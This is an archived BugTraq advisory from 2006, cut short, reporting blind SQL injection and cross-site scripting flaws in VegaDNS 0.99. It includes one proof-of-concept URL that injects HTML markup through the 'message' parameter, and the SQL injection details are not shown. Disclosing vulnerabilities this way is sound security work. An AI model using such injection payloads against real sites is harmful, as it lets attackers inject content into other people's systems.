BugTraq
Name:
Email:
*Note: Email address will appear as "user domain ext" to prevent harvesting.
Subject:
Message:
 
Vegadns blind sql injection and cross site scripting Apr 10 2006 06:30AM
king_purba yahoo co uk
Author : Ph03n1X
email : king_purba (at) yahoo.co (dot) uk [email concealed]
site : http://kandangjamur.net/
vendor : www.vegadns.org
version: 0.99

XSS
----
PoC :
http://exam.com/vegadns/index.php?VDNS_Sessid=m42644r75o1eg4f7mb7e4rnpg7
&message=%3Ch1%3E%3Cmarquee%3Ealoo%3C/marquee%3E%3C/h1%3E

Vulnerable script is located in...

[ more ]  
 

Privacy Statement
Copyright 2010, SecurityFocus